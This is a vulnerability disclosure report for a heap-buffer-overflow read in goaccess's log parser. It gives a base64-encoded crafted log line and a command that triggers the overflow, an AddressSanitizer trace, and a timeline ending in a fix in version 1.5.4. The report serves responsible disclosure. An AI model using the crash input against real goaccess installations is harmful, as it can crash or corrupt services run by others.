Heap-based Buffer Overflow in allinurl/goaccess

Valid

Reported on

Nov 25th 2021


Description

Good evening and Happy Turkey Day! We are truly thankful for the Open Source Security community this year. Whilst testing goaccess built from commit 9774249, we discovered a crafted log which can trigger a heap-buffer-overflow during a memcmp operation on line 1525 of /src/parser.c

Proof of Concept

** echo "IDAyL01hci8wOjA6MDowIDAwMCIwIA==" | base64 -d > /tmp/fuzz.log

** ./goaccess --log-format COMBINED --no-global-config -r --no-ip-validation --no-strict-status --process-and-exit -f /tmp/fuzz.log

Stack Trace

==52021==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x602000004ed1 at pc 0x0000003122e6 bp 0x7fff8f57a280 sp 0x7fff8f579a28
READ of size 3 at 0x602000004ed1 thread T0
    #0 0x3122e5 in MemcmpInterceptorCommon(void*, int (*)(void const*, void const*, unsigned long), void const*, void const*, unsigned long) (/root/goaccess/goaccess+0x3122e5)
    #1 0x3127da in memcmp (/root/goaccess/goaccess+0x3127da)
    #2 0x47a5e2 in is_404 /root/goaccess/src/parser.c:1525:27
    #3 0x47a5e2 in pre_process_log /root/goaccess/src/parser.c:1775:7
    #4 0x48e7e6 in read_line /root/goaccess/src/parser.c:1799:14
    #5 0x48e7e6 in read_lines /root/goaccess/src/parser.c:1916:16
    #6 0x48e7e6 in read_log /root/goaccess/src/parser.c:2010:7
    #7 0x48e7e6 in parse_log /root/goaccess/src/parser.c:2061:9
    #8 0x43ab2b in main /root/goaccess/src/goaccess.c:1612:14
    #9 0x7f9a0454f0b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16
    #10 0x2fbd9d in _start (/root/goaccess/goaccess+0x2fbd9d)

0x602000004ed1 is located 0 bytes to the right of 1-byte region [0x602000004ed0,0x602000004ed1)
allocated by thread T0 here:
    #0 0x376ffd in malloc (/root/goaccess/goaccess+0x376ffd)
    #1 0x51adb8 in xmalloc /root/goaccess/src/xmalloc.c:46:14
    #2 0x47cc99 in parse_format /root/goaccess/src/parser.c:1384:18
    #3 0x4796c1 in pre_process_log /root/goaccess/src/parser.c:1745:11
    #4 0x48e7e6 in read_line /root/goaccess/src/parser.c:1799:14
    #5 0x48e7e6 in read_lines /root/goaccess/src/parser.c:1916:16
    #6 0x48e7e6 in read_log /root/goaccess/src/parser.c:2010:7
    #7 0x48e7e6 in parse_log /root/goaccess/src/parser.c:2061:9
    #8 0x43ab2b in main /root/goaccess/src/goaccess.c:1612:14
    #9 0x7f9a0454f0b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16

Impact

This vulnerability is capable of crashing the software, heap corruption, and other unintended consequences of reading past the buffer.

Occurrences

We are processing your report and will contact the allinurl/goaccess team within 24 hours. a year ago
We have contacted a member of the allinurl/goaccess team and are waiting to hear back a year ago
We have sent a follow up to the allinurl/goaccess team. We will try again in 7 days. a year ago
Gerardo O. validated this vulnerability a year ago
geeknik has been awarded the disclosure bounty
The fix bounty is now up for grabs
Gerardo O. marked this as fixed in 1.5.4 with commit ec8533 a year ago
Gerardo O. has been awarded the fix bounty
This vulnerability will not receive a CVE
parser.c#L1525 has been validated
to join this conversation